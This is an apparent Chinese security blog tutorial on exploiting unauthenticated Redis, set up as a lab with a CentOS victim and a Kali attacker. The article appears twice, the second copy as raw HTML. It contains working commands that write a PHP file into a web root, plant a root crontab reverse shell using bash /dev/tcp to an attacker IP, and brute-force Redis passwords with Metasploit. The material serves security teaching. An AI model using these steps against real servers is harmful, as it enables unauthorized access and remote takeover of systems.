Redis未授权利用

Author：逍遥子
发布时间：December 20, 2023
1962 views
No comments
2352 words
Categories：全部

Redis是跨平台的非关系型数据库。可以将内存中的数据保存在磁盘中，重启的时候可以再次加载进行使用。它支持字符串、哈希表、列表、集合、有序集合，位图，hyperloglogs等数据类型。

Redis

漏洞原理

Redis默认6379端口并且为密码或弱密码的情况下,处于公网的redis服务就会被任意的用户未授权访问，读取数据，利用redis自身的命令，进行写入文件操作。从而获得系统权限。

实验环境

Centos7(公网、受害端)
Kali Linux（攻击端）
安装Redis
我们首先在Centos中安装Redis。分别执行下面命令
```
wget http://download.redis.io/releases/redis-2.8.17.tar.gz #下载
tar xzf redis-2.8.17.tar.gz #解压
cd redis-2.8.17
make #编译
cd src
cp redis-server /usr/bin
cp redis-cli /usr/bin
cd ..
cp redis.conf /etc/
redis-server /etc/redis.conf
```
需要注意的是，我们要在防火墙和安全组中开启6379端口
未授权测试
我们在kali中直接执行下面命令
```
redis-cli -h 8.219.xxx.xxx
```
如果是高版本的redis需要修改配置文件。将bind前面#注释符去掉，将protected-mode 后面改为no。
利用redis写webshell
在利用redis写webshell时，我们需要知道web站点的路径。不然即使生成webshell你也连不上。假设我们的站点目录时/var/www/html执行下面命令即可。
```
config set dir /var/www/html #设置目录
config set dbfilename kali.php #生成文件
set xxx "\r\n\r\n<?php phpinfo();?>\r\n\r\n" #给文件中写入内容
save#保存
```
完成后，我们访问文件
反弹Shell
我们在kali中利用nc进行监听端口。
```
nc -lvp 5555
```
接下来我们用redis创建定时任务文件。通过定时任务来上线nc
```
config set dir /var/spool/cron/crontabs
config set dbfilename root
set xxx "\n\n* * * * * /bin/bash -i>&/dev/tcp/kali的IP/5555 0>&1\n\n"
save
```
到时间后，会自动执行命令从而上线。
redis密码破解
一般情况下，都会设置默认密码。我们在配置文件redis.conf修改。

配置msf
```
msfconsole
use auxiliary/scanner/redis/redis_login
set RHOSTS 8.219.xxx.xxx
set PASS_FILE /root/22.txt #设置密码字典
run
```

破解成功
在msf中还有很多对redis的利用模块。我们可以利用下面命令查看

search redis

简单配置后，便可以直接使用。

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/4171.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

Kali笔记一键关注

Last modification：December 20, 2023

© Allow specification reprint

正在沿街乞讨中……

Leave a Comment Cancel reply
请输入正确的邮箱，以便收到回复!

Comment *

Private comment

Name *

🎲

Email *

Site

妥当个哈狗
大佬请教一下，我一台普通的pc机，2块1t的硬盘，bios设置...
很无语
请问最后一步怎么修改VUE呀
xxxyyy
抖音那个现在是不是失效了，能下载不能播放，博主有空再验证一下呗
Kevin's Space
我改天试一下，现在我是传到网上的一些平台，倒也快速
Kevin's Space
这动环监控不会是你手搓的吧？大佬！

Redis未授权利用

逍遥子 • 2023 年 12 月 20 日

<blockquote><code>Redis</code>是跨平台的非关系型数据库。可以将内存中的数据保存在磁盘中，重启的时候可以再次加载进行使用。它支持字符串、哈希表、列表、集合、有序集合，位图，hyperloglogs等数据类型。</blockquote><p><img src="https://blog.bbskali.cn/usr/uploads/2023/12/4106347873.png" alt="Redis" title="Redis" style=""></p><h3>漏洞原理</h3><p><code>Redis</code>默认<code>6379</code>端口并且为密码或弱密码的情况下,处于公网的redis服务就会被任意的用户未授权访问，读取数据，利用redis自身的命令，进行写入文件操作。从而获得系统权限。</p><h3>实验环境</h3><ul><li>Centos7(公网、受害端)</li><li><p>Kali Linux（攻击端）</p><h3>安装Redis</h3><p>我们首先在Centos中安装<code>Redis</code>。分别执行下面命令</p><pre><code>wget http://download.redis.io/releases/redis-2.8.17.tar.gz #下载
tar xzf redis-2.8.17.tar.gz #解压
cd redis-2.8.17
make #编译
cd src
cp redis-server /usr/bin
cp redis-cli /usr/bin
cd ..
cp redis.conf /etc/
redis-server /etc/redis.conf</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2023/12/1035769553.png" alt="编译安装" title="编译安装" style=""><br><img src="https://blog.bbskali.cn/usr/uploads/2023/12/1748934037.png" alt="启动" title="启动" style=""><br>需要注意的是，我们要在防火墙和安全组中开启<code>6379</code>端口</p><h3>未授权测试</h3><p>我们在kali中直接执行下面命令</p><pre><code>redis-cli -h 8.219.xxx.xxx</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2023/12/2499718513.png" alt="连接成功" title="连接成功" style=""><br>如果是高版本的redis需要修改配置文件。将bind前面<code>#</code>注释符去掉，将<code>protected-mode</code> 后面改为<code>no</code>。</p><h3>利用redis写webshell</h3><p>在利用redis写webshell时，我们需要知道web站点的路径。不然即使生成webshell你也连不上。假设我们的站点目录时<code>/var/www/html</code>执行下面命令即可。</p><pre><code>config set dir /var/www/html #设置目录
config set dbfilename kali.php #生成文件
set xxx &quot;\r\n\r\n&lt;?php phpinfo();?&gt;\r\n\r\n&quot; #给文件中写入内容
save#保存</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2023/12/3207255339.png" alt="" title="" style=""><br>完成后，我们访问文件<br><img src="https://blog.bbskali.cn/usr/uploads/2023/12/4233604910.png" alt="" title="" style=""></p><h3>反弹Shell</h3><p>我们在kali中利用nc进行监听端口。</p><pre><code>nc -lvp 5555</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2023/12/3081032093.png" alt="" title="" style=""><br>接下来我们用<code>redis</code>创建定时任务文件。通过定时任务来上线nc</p><pre><code>config set dir /var/spool/cron/crontabs
config set dbfilename root
set xxx &quot;\n\n* * * * * /bin/bash -i&gt;&amp;/dev/tcp/kali的IP/5555 0&gt;&amp;1\n\n&quot;
save</code></pre><p>到时间后，会自动执行命令从而上线。</p><h3>redis密码破解</h3><p>一般情况下，都会设置默认密码。我们在配置文件<code>redis.conf</code>修改。<br><img src="https://blog.bbskali.cn/usr/uploads/2023/12/4287417953.png" alt="" title="" style=""><br>配置msf</p><pre><code>msfconsole
use auxiliary/scanner/redis/redis_login
set RHOSTS 8.219.xxx.xxx
set PASS_FILE /root/22.txt #设置密码字典
run</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2023/12/2047602438.png" alt="配置如上" title="配置如上" style=""></p></li></ul><p><img src="https://blog.bbskali.cn/usr/uploads/2023/12/740237584.png" alt="破解成功" title="破解成功" style=""><br>在msf中还有很多对redis的利用模块。我们可以利用下面命令查看</p><pre><code>search redis</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2023/12/2679261473.png" alt="" title="" style=""><br>简单配置后，便可以直接使用。</p><hr class="content-copyright" style="margin-top:50px" /><div class="post-copyright" style="font-style:normal"> <p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：<a class="content-copyright" href="https://blog.bbskali.cn/4171.html">https://blog.bbskali.cn/4171.html</a></p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>